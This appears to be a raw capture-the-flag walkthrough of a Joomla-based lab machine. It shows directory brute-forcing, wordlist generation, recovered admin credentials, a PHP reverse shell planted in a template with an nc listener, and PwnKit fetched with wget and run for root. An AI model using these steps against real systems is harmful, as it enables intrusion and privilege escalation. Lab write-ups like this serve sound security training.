


┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.195.79/         

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Oct 11 06:38:58 2025
URL_BASE: http://192.168.195.79/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.195.79/ ----
+ http://192.168.195.79/index.html (CODE:200|SIZE:125)                                                              
==> DIRECTORY: http://192.168.195.79/joomla/                                                                        
+ http://192.168.195.79/server-status (CODE:403|SIZE:279)                                                           
                                                                                                                    
---- Entering directory: http://192.168.195.79/joomla/ ----
==> DIRECTORY: http://192.168.195.79/joomla/administrator/                                                          
==> DIRECTORY: http://192.168.195.79/joomla/bin/                                                                    
==> DIRECTORY: http://192.168.195.79/joomla/cache/                                                                  
==> DIRECTORY: http://192.168.195.79/joomla/components/                                                             
==> DIRECTORY: http://192.168.195.79/joomla/images/                                                                 
==> DIRECTORY: http://192.168.195.79/joomla/includes/                                                               
+ http://192.168.195.79/joomla/index.php (CODE:200|SIZE:10013)                                                      
==> DIRECTORY: http://192.168.195.79/joomla/language/                                                               
==> DIRECTORY: http://192.168.195.79/joomla/layouts/                                                                
==> DIRECTORY: http://192.168.195.79/joomla/libraries/                                                              
==> DIRECTORY: http://192.168.195.79/joomla/media/                                                                  
==> DIRECTORY: http://192.168.195.79/joomla/modules/                                                                
==> DIRECTORY: http://192.168.195.79/joomla/plugins/                                                                
+ http://192.168.195.79/joomla/robots.txt (CODE:200|SIZE:836)  



┌──(root㉿kali)-[/home/kali]
└─# cewl http://192.168.243.79/joomla/administrator/ -d 4 -m 5 -w cewl.txt
CeWL 6.2.1 (More Fixes) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
                                                                                   


then we launch a clusterbomb attack


we find Joomla:Gotham



Extensions > Templates > Templates

edit index.php with pentest monkey reverse php


┌──(root㉿kali)-[/home/kali]
└─# nc -lvnp 9001
listening on [any] 9001 ...
connect to [192.168.45.212] from (UNKNOWN) [192.168.243.79] 52204
Linux glasgowsmile 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 04:35:01 up 21 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ 


www-data@glasgowsmile:/home$ ls
abner  penguin	rob
www-data@glasgowsmile:/home$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/pkexec
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chfn




www-data@glasgowsmile:/tmp$ wget https://github.com/ly4k/PwnKit/raw/main/PwnKit -O pwnkit
--2025-11-17 04:40:02--  https://github.com/ly4k/PwnKit/raw/main/PwnKit
Resolving github.com (github.com)... 140.82.112.3
Connecting to github.com (github.com)|140.82.112.3|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit [following]
--2025-11-17 04:40:02--  https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18040 (18K) [application/octet-stream]
Saving to: ‘pwnkit’

pwnkit                        100%[==============================================>]  17.62K  --.-KB/s    in 0s      

2025-11-17 04:40:02 (116 MB/s) - ‘pwnkit’ saved [18040/18040]

www-data@glasgowsmile:/tmp$ chmod +x pwnkit
www-data@glasgowsmile:/tmp$ ./pwnkit
root@glasgowsmile:/tmp#

